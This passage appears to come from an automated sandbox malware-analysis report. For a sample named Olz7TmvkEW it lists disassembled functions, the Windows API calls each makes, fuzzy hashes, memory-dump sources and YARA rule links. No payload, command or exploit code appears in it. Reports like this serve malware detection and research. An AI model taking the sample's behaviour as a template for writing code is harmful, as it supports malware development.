                                                                      • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                      • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                                      Function 0040E036 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                      • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@memmove
                                                                      • String ID:
                                                                      • API String ID: 3828600508-0
                                                                      • Opcode ID: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
                                                                      • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                                      • Opcode Fuzzy Hash: 0714fe3c1df4fdca5aeeb7c8bbfd15098e1df3d209b63f798c6738da8b9a7e44
                                                                      • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                                      Function 004026CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID: @
                                                                      • API String ID: 1890195054-2766056989
                                                                      • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                      • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                                      • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                      • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                                      Function 0040C7E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: lA
                                                                      • API String ID: 613200358-262130271
                                                                      • Opcode ID: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
                                                                      • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                                      • Opcode Fuzzy Hash: 90b0b06cd13890f620005806bac62f7fad3fb4d0d322495d17032a83e40ec68c
                                                                      • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                                      Function 0041017A Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@H_prolog
                                                                      • String ID:
                                                                      • API String ID: 1329742358-0
                                                                      • Opcode ID: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
                                                                      • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                                      • Opcode Fuzzy Hash: bd67a156173473a68c65af7978f3cde24eb8832407ae1c7884f978518f4fb4eb
                                                                      • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                                      Function 0040250F Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@
                                                                      • String ID:
                                                                      • API String ID: 1936579350-0
                                                                      • Opcode ID: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
                                                                      • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                                      • Opcode Fuzzy Hash: b4df439f1ba102251751b61151d0347022af4275d8d69c1088113cf519c099ee
                                                                      • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                                      Function 004045F4 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetEnvironmentVariableW.KERNELBASE(?,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404630
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00406260,?,00000000,0000000A), ref: 00404639
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@EnvironmentVariable
                                                                      • String ID:
                                                                      • API String ID: 3880889418-0
                                                                      • Opcode ID: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
                                                                      • Instruction ID: b821aa63e9602637d8feb686bb827f934507ba03fca214f0c99b91fc16a187d9
                                                                      • Opcode Fuzzy Hash: 22152b305ce174b67320051486f034778fb1b596505a7c24a7f213f79468360f
                                                                      • Instruction Fuzzy Hash: BDF05836900118AFCB01AF98EC458CE77B8EB48704B41807AE922A72A1DB34AD418B8D
                                                                      Function 0040C8F9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                      • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                      • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                      • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                      Function 0040DA22 Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                      • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                      • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                      • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                      Function 00410329 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                      • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                      • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                      • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                      Function 00401252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                      • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                      • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                      • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                      Function 0040C95F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFileHandle
                                                                      • String ID:
                                                                      • API String ID: 3498533004-0
                                                                      • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                      • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                      • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                      • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                      Function 0040CAA0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                      • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                      • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                      • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                      Function 00406E05 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: _beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3014514943-0
                                                                      • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                      • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                      • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                      • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                      Function 0040C9E5 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                      • Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
                                                                      • Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
                                                                      • Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54
                                                                      Function 004127AA Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                      • Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
                                                                      • Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
                                                                      • Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669
                                                                      Function 0040CA73 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FileTime
                                                                      • String ID:
                                                                      • API String ID: 1425588814-0
                                                                      • Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                      • Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
                                                                      • Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
                                                                      • Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02
                                                                      Function 0040CE83 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@
                                                                      • String ID:
                                                                      • API String ID: 1033339047-0
                                                                      • Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                      • Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
                                                                      • Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
                                                                      • Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA
                                                                      Function 004032D9 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@
                                                                      • String ID:
                                                                      • API String ID: 1033339047-0
                                                                      • Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                      • Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
                                                                      • Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
                                                                      • Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D
                                                                      Function 0040C88E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
